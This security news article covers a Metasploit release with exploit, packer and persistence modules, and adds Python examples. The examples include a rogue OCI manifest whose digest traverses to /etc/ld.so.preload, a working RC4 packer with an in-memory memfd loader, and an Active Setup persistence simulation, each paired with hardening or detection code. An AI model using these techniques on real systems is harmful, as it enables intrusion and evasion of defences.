Metasploit Update Introduces New Exploits and Evasion Tactics for Linux and BeyondTrust Systems

Metasploit’s Latest Update: New Exploits and Evasion Techniques Targeting Linux and BeyondTrust

On February 27, 2026, the Metasploit Framework shipped a release with seven new modules, nine feature enhancements, and a set of bug fixes. The new modules give penetration testers working exploits for several high-severity vulnerabilities, a Linux evasion packer, and two Windows persistence techniques.

Critical Remote Code Execution Exploits

The release adds exploit modules for critical vulnerabilities in enterprise and AI infrastructure:

– Ollama Model Registry Path Traversal (CVE-2024-37032): Rated CVSS 8.8, this vulnerability lies in Ollama's model pull mechanism, which did not sanitize path components taken from a registry's manifest. The module hosts a rogue OCI registry; when the target is told to pull a model from it, path traversal sequences in the manifest make Ollama write a malicious shared object, plus the loader configuration that makes new processes pick it up (the public exploit for this CVE uses /etc/ld.so.preload), outside the model store. Forcing Ollama to spawn a new process then loads the library, giving unauthenticated remote code execution with Ollama's privileges, which are root in the common container deployment. The pull endpoint is reachable without credentials because Ollama's API carries no authentication of its own.

– BeyondTrust PRA and RS Command Injection (CVE-2026-1731): Rated CVSS 9.9, this flaw allows unauthenticated OS command injection on BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) appliances. The release also adds a BeyondTrust helper library to streamline future module development against these appliances.

– Grandstream GXP1600 Stack Overflow (CVE-2026-2329): Rated CVSS 9.3, this stack-based overflow in Grandstream GXP1600-series VoIP phones yields a root session on the device. The release ships one exploit module and two post-exploitation modules that use that access to harvest stored credentials and to proxy the phone's SIP traffic for packet capture.
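The Ollama item above describes the bug class without showing it. The following is an added example, not Metasploit or Ollama code: it contrasts a blob path built from an unvalidated manifest digest with a hardened version that enforces the digest format and confirms the resolved path stays inside the blob directory. The install root, the on-disk naming scheme (colon replaced by a dash) and the manifest are assumptions constructed for the example.

```python
"""Added example (not Metasploit or Ollama code): how a layer digest taken
verbatim from an OCI manifest becomes a path traversal, and the checks
that close it.

Assumptions (mine, not the page's): the client stores each layer at
<models_dir>/blobs/<digest with ':' replaced by '-'>, and the digest string
comes straight from the manifest the (rogue) registry served.
"""
from __future__ import annotations

import json
import os
import re

MODELS_DIR = "/var/lib/ollama/.ollama/models"   # hypothetical install root
BLOBS_DIR = os.path.join(MODELS_DIR, "blobs")

# A well-formed OCI content digest: algorithm, colon, lowercase hex of fixed length.
DIGEST_RE = re.compile(r"^sha256:[0-9a-f]{64}$")


def blob_path_vulnerable(digest: str) -> str:
    """Trusts the manifest: '../' sequences survive into the filesystem path."""
    return os.path.join(BLOBS_DIR, digest.replace(":", "-"))


def is_valid_digest(digest: str) -> bool:
    return DIGEST_RE.fullmatch(digest) is not None


def escapes_blob_dir(path: str) -> bool:
    """True when the normalised path is not underneath BLOBS_DIR."""
    return os.path.commonpath([BLOBS_DIR, os.path.normpath(path)]) != BLOBS_DIR


def blob_path_hardened(digest: str) -> str:
    """Reject anything that is not a digest, then re-check the resolved path.
    The second check is belt-and-braces: it catches future naming changes that
    might let a valid-looking string still reach outside the store."""
    if not is_valid_digest(digest):
        raise ValueError(f"malformed digest: {digest!r}")
    path = os.path.normpath(os.path.join(BLOBS_DIR, digest.replace(":", "-")))
    if escapes_blob_dir(path):
        raise ValueError(f"digest escapes blob dir: {digest!r}")
    return path


# Constructed manifest as a rogue registry might serve it: one honest layer and
# one whose "digest" is a traversal aimed at the dynamic loader's preload file.
ROGUE_MANIFEST = json.dumps({
    "schemaVersion": 2,
    "layers": [
        {"mediaType": "application/vnd.ollama.image.model",
         "digest": "sha256:" + "ab" * 32, "size": 4},
        {"mediaType": "application/vnd.ollama.image.model",
         "digest": "../../../../../../etc/ld.so.preload", "size": 32},
    ],
})


def audit_manifest(manifest_json: str) -> list[tuple[str, bool, str]]:
    """Per layer: (digest, vulnerable path escapes the store?, hardened verdict)."""
    results = []
    for layer in json.loads(manifest_json)["layers"]:
        digest = layer["digest"]
        escapes = escapes_blob_dir(blob_path_vulnerable(digest))
        try:
            blob_path_hardened(digest)
            verdict = "accepted"
        except ValueError as err:
            verdict = f"rejected ({err})"
        results.append((digest, escapes, verdict))
    return results


if __name__ == "__main__":
    for digest, escapes, verdict in audit_manifest(ROGUE_MANIFEST):
        print(f"{digest!r}")
        print(f"  vulnerable code writes outside blob dir: {escapes}")
        print(f"  hardened code: {verdict}")
```

The second layer resolves to /etc/ld.so.preload under the vulnerable path builder, which is exactly the write a follow-on in-process library load needs; the hardened builder rejects it on format alone, before the path is ever joined.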

Module Overview

| Module Name | CVE ID | Target | Module Type |
|---|---|---|---|
| Ollama Path Traversal RCE | CVE-2024-37032 | Linux / AI | Exploit |
| BeyondTrust PRA/RS RCE | CVE-2026-1731 | Appliances | Exploit |
| Grandstream GXP1600 RCE | CVE-2026-2329 | VoIP Devices | Exploit & Post |
| Linux RC4 Packer | N/A | ARM64 Linux | Evasion |
| WSL Startup Persistence | N/A | Windows / WSL | Exploit (persistence) |
| Windows Active Setup | N/A | Windows | Exploit (persistence) |

Advanced Evasion and Persistence Techniques

A major highlight of this release is the first Linux evasion module for the ARM64 architecture. The Linux RC4 Packer RC4-encrypts the payload ELF, decrypts and executes it directly from memory rather than dropping it to disk, and adds sleep-based evasion to outlast time-limited analysis. RC4 here is obfuscation, not protection: it defeats static signatures on the stored file, while in-memory execution still leaves runtime artifacts that endpoint telemetry can flag.
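The following is an added example, not the Metasploit module, showing the two ingredients the paragraph names on the Linux side: an RC4 wrapper around an ELF and execution from memory via memfd_create, together with the artifact that technique leaves for a defender. The key, the memfd name and the /proc samples are constructed for the example; the RC4 routine is the standard KSA/PRGA and is checked against the well-known "Key"/"Plaintext" test vector.

```python
"""Added example (not the Metasploit Linux RC4 Packer): RC4-pack an ELF,
unpack it, execute it from an anonymous memfd, and recognise the trace that
in-memory execution leaves in /proc. Requires Linux 3.17+ for memfd_create
and Python 3.8+ for os.memfd_create.
"""
import os
import sys

ELF_MAGIC = b"\x7fELF"


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key-scheduling then keystream XOR. Symmetric, so the same
    call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def pack(elf: bytes, key: bytes) -> bytes:
    """Encrypt an ELF; the 7f 45 4c 46 header no longer appears in the output."""
    if not elf.startswith(ELF_MAGIC):
        raise ValueError("input is not an ELF image")
    return rc4(key, elf)


def unpack(blob: bytes, key: bytes) -> bytes:
    """Decrypt and sanity-check the magic before handing the image to exec."""
    elf = rc4(key, blob)
    if not elf.startswith(ELF_MAGIC):
        raise ValueError("wrong key or corrupted blob")
    return elf


def exec_from_memory(elf: bytes, argv: list) -> None:
    """Write the image into an anonymous memfd and execve it: nothing is
    written to a filesystem path. Does not return on success."""
    fd = os.memfd_create("payload", os.MFD_CLOEXEC)   # name is arbitrary
    os.write(fd, elf)
    os.fexecve(fd, argv, os.environ)


def looks_memfd_backed(exe_link: str) -> bool:
    """Detection side. For a process started this way, readlink on
    /proc/<pid>/exe yields '/memfd:<name> (deleted)' instead of a real path."""
    return exe_link.startswith("/memfd:")


# Constructed readlink results, as a /proc sweep might return them.
SAMPLE_EXE_LINKS = [
    "/usr/bin/python3",
    "/memfd:payload (deleted)",
    "/tmp/.x (deleted)",          # deleted on-disk binary: suspicious, but not memfd
]


def flag_memfd_processes(exe_links: list) -> list:
    return [link for link in exe_links if looks_memfd_backed(link)]


if __name__ == "__main__":
    key = b"demo-key"                       # hypothetical packer key
    with open("/bin/true", "rb") as f:      # any small ELF on the host stands in for a payload
        packed = pack(f.read(), key)
    print(f"packed {len(packed)} bytes; first bytes now {packed[:4].hex()} rather than 7f454c46")
    print("memfd-backed processes in sample:", flag_memfd_processes(SAMPLE_EXE_LINKS))
    if "--run" in sys.argv:                 # replaces this interpreter with /bin/true
        exec_from_memory(unpack(packed, key), ["true"])
```

A defender sweeping /proc for the `/memfd:` prefix catches this loader regardless of the cipher used, which is the point of the caveat above: the packer hides the file, not the process.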

Additionally, new persistence modules have been added for Windows and the Windows Subsystem for Linux (WSL):

– WSL Startup Persistence: This module drops a launcher into the user's Startup folder so the payload runs under WSL each time that user logs on (the Startup folder fires at logon, not at boot).

– Windows Registry Active Setup: This module registers the payload under the Active Setup registry key, a native Windows mechanism that runs a command when a user logs on. Two caveats: the payload executes in the logging-on user's context rather than as SYSTEM, even though writing the key itself needs administrative rights, and Active Setup fires only once per user profile, because Windows records a per-user marker after the first run and skips the entry on later logons unless its version is raised.
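To make the once-per-profile behaviour concrete, here is an added example (not the Metasploit module) that models the gate Windows applies at logon: the machine-wide entry under `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID}` is compared with the same GUID under `HKCU`, the `StubPath` runs when the per-user copy is missing or carries a lower `Version`, and the per-user copy is then written. The registry contents are plain dictionaries constructed for the example, and the numeric field-by-field comparison of `Version` and the treatment of a missing `IsInstalled` as enabled are assumptions.

```python
"""Added example (not Metasploit code): simulate the Active Setup logon gate
over constructed registry data to show why a StubPath fires once per user
profile and how a version bump re-arms it.

Assumptions: Version strings such as '1,0,0,0' compare numerically field by
field; an entry with no IsInstalled value is treated as enabled (IsInstalled=0
disables it).
"""
from __future__ import annotations


def parse_version(value: str | None) -> tuple[int, ...]:
    """Missing or blank version sorts lowest, so a versioned HKLM entry beats it."""
    if not value:
        return (0,)
    return tuple(int(part) for part in value.replace(".", ",").split(","))


def will_run_at_logon(hklm_entry: dict, hkcu_entry: dict | None) -> bool:
    """Decide whether the StubPath of one component runs for this user."""
    if hklm_entry.get("IsInstalled", 1) == 0:
        return False                       # explicitly disabled
    if not hklm_entry.get("StubPath"):
        return False                       # nothing to execute
    if hkcu_entry is None:
        return True                        # never run for this profile
    return parse_version(hklm_entry.get("Version")) > parse_version(hkcu_entry.get("Version"))


def simulate_logon(hklm_components: dict, hkcu_components: dict) -> list:
    """Return the StubPaths that would execute, and record each run in HKCU
    the way Windows does, so the next call for the same user is a no-op."""
    executed = []
    for guid, entry in hklm_components.items():
        if will_run_at_logon(entry, hkcu_components.get(guid)):
            executed.append(entry["StubPath"])
            hkcu_components[guid] = {"Version": entry.get("Version", "")}
    return executed


def pending_for_user(hklm_components: dict, hkcu_components: dict) -> list:
    """Audit view: which components would fire at this user's next logon,
    without mutating anything. Useful when reviewing a suspect host."""
    return [(guid, entry["StubPath"]) for guid, entry in hklm_components.items()
            if will_run_at_logon(entry, hkcu_components.get(guid))]


if __name__ == "__main__":
    GUID = "{00000000-0000-0000-0000-000000000001}"       # hypothetical component GUID
    hklm = {GUID: {"StubPath": r"C:\Users\Public\payload.exe",
                   "Version": "1,0,0,0", "IsInstalled": 1}}
    hkcu = {}                                            # fresh profile

    print("first logon :", simulate_logon(hklm, hkcu))   # payload runs
    print("second logon:", simulate_logon(hklm, hkcu))   # nothing: HKCU marker present
    hklm[GUID]["Version"] = "1,0,0,1"                     # attacker bumps version
    print("after bump  :", pending_for_user(hklm, hkcu)) # armed again for this user
```

The audit helper is the part a responder wants: a GUID whose HKLM version is ahead of every user's HKCU copy, with a StubPath outside the usual Windows component directories, is the signature of this technique.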

Key Enhancements and Fixes

The update also brings significant improvements to existing modules:

– Unreal IRCd and vsftpd backdoor modules: gained more reliable check methods, native Meterpreter payloads, and verbose output for troubleshooting.

– SolarWinds exploit: now selects the correct SRVHOST value automatically.

– MS17-010 scanner: gained a check method, improving its automation metadata.

Internally, the shared execution code has been split so that different platforms and architectures are handled more granularly. Bug fixes to the LDAP ESC and GraphQL introspection scanners eliminate crashes and false positives.